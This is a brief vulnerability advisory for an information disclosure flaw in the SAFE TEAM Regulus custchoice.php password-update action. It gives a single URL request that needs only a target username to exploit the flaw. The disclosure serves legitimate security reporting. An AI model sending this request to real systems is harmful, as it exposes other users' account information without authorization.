SAFE TEAM Regulus Custchoice.PHP Update Your Password Action Information Disclosure Vulnerability

SAFE TEAM Regulus Custchoice.PHP Update Your Password Action Information Disclosure Vulnerability

There is no exploit required; the following request is sufficient to exploit this vulnerability:

http://example.com/base-dir/htmlcust/custchoice.php?lang=English&userid=<name>&action=To update your password

Where '<name>' is the target username.